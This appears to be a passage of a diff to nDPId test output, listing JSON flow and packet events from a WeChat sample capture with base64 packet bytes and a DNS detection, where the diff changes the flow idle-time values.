ZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BdAAEAGIxbAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvX7AAAAQEICgA\/UBZwfB+e"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/69AAEAG937AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPlEAAAAQEICgA\/UBZr6XAp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqVAAEAGaInAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdlQAAAQEICgA\/UBdr6XCp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7tAAEAGr3PAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyDLQAAAQEICgA\/UBdr6XGp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRZAAEAG2hfAqAFnX2UiIpknAFAjQjGaFOMj7IARBf682AAAAQEICgA\/UBdwfIhZ"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0251AAEAGiP7AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1WAAAAQEICgA\/UBcc0iJk"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e59AAEAGnZzAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW08AAAAQEICgA\/UBdF3\/Tx"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkRAAEAG0OrAqAFnX2UiIYilAFA23DHogeAL9oARBaR6iAAAAQEICgA\/UBdr6Xcq"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} +02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BdAAEAGIxbAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvX7AAAAQEICgA\/UBZwfB+e"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/69AAEAG937AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPlEAAAAQEICgA\/UBZr6XAp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqVAAEAGaInAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdlQAAAQEICgA\/UBdr6XCp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7tAAEAGr3PAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyDLQAAAQEICgA\/UBdr6XGp"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRZAAEAG2hfAqAFnX2UiIpknAFAjQjGaFOMj7IARBf682AAAAQEICgA\/UBdwfIhZ"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0251AAEAGiP7AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1WAAAAQEICgA\/UBcc0iJk"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e59AAEAGnZzAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW08AAAAQEICgA\/UBdF3\/Tx"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkRAAEAG0OrAqAFnX2UiIYilAFA23DHogeAL9oARBaR6iAAAAQEICgA\/UBdr6Xcq"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+U9AAEARvKPAqAFnwKgB\/uM1ADUAMHLoUUIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7xAAEAGr3LAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyC7gAAAQEICgA\/UFZr6XGp"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1492171177028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177028,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00npAAEAGJLPAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64AQAAAQEICgA\/UFdwfJTZ"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1492171177032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177032,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkVAAEAG0OnAqAFnX2UiIYilAFA23DHogeAL9oARBaR6RwAAAQEICgA\/UFhr6Xcq"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1492171177040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqZAAEAGaIjAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdUgAAAQEICgA\/UFpr6XCp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177040,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0255AAEAGiP3AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1FQAAAQEICgA\/UFoc0iJk"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1492171177240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177240,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BlAAEAGIxTAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXdgAAAQEICgA\/UIxwfB+e"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171177308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177308,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0259AAEAGiPzAqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf00gAAAQEICgA\/UJ0c0iJk"} 